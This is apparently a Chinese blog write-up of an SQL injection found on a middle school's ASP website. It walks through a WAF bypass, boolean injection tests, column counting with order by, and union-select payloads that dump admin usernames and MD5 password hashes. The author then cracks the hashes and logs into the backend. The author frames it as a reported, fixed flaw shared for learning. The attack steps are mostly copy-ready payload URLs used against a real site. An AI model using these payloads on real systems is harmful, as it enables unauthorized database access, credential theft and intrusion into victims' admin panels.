在利用fofa收集信息的时候发现的,我这里直接开始挖洞部分写了。
前言:
目标是一个中学的站点,在一次挖洞过程中遇到个sql注入,漏洞已报送平台进行了修复。该文章仅用于交流学习,切勿利用相关信息非法测试,我也是刚入门的小白,欢迎各位大佬指点。
![](https://img-blog.csdnimg.cn/img_convert/43f3038e8f67e72e72a8f141c43b8beb.png)
访问url/gywm.asp?id=95%20and%201=1被拦截了(Wts-waf我这里利用了此文章
https://www.freebuf.com/articles/268726.html)
![](https://img-blog.csdnimg.cn/img_convert/d334e58f7d0fad9b804c73e0dcc4e79a.png)
url/gywm.asp?id=95 +and+1=1的时候返回正常
![](https://img-blog.csdnimg.cn/img_convert/5e9e64a0c92b22520b15924035eee6f8.png)
url/gywm.asp?id=95 +and+1=2时候返回空白页面
![](https://img-blog.csdnimg.cn/img_convert/0fa651cb785ebe1a22de734777259dcb.png)
已确定存在sql注入漏洞;
开始使用order by获得表的列数
访问url/gywm.asp?id=95+order+by+19--+的时候页面正常的;
访问: url/gywm.asp?id=95+order+by+20--+的时候页面显示500
判断出列数为19,此时我们可以通过union联合查询进行注入。
Payload:
url/gywm.asp?id=95+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin
此时我们可知admin的位置所以我把猜出来的表和列名放在了3和10的位置, 这下就已拿到了这两列名中的值。
Payload:
url/gywm.asp?id=95+union+select+1,2,username,4,5,6,7,8,9,userpass,11,12,13,14,15,16,17,18,19+from+admin
![](https://img-blog.csdnimg.cn/img_convert/27d778a91772badce7fecae2db1d735b.png)
账户密码都爆出来了然后去把md5密码解密后直接进去后台渗透也到此结束
![](https://img-blog.csdnimg.cn/img_convert/8a07d52698c7f37944b63a0fd46ed1b5.png)
![](https://img-blog.csdnimg.cn/img_convert/8c1d9a58b2fb919a0760f431c532067b.png)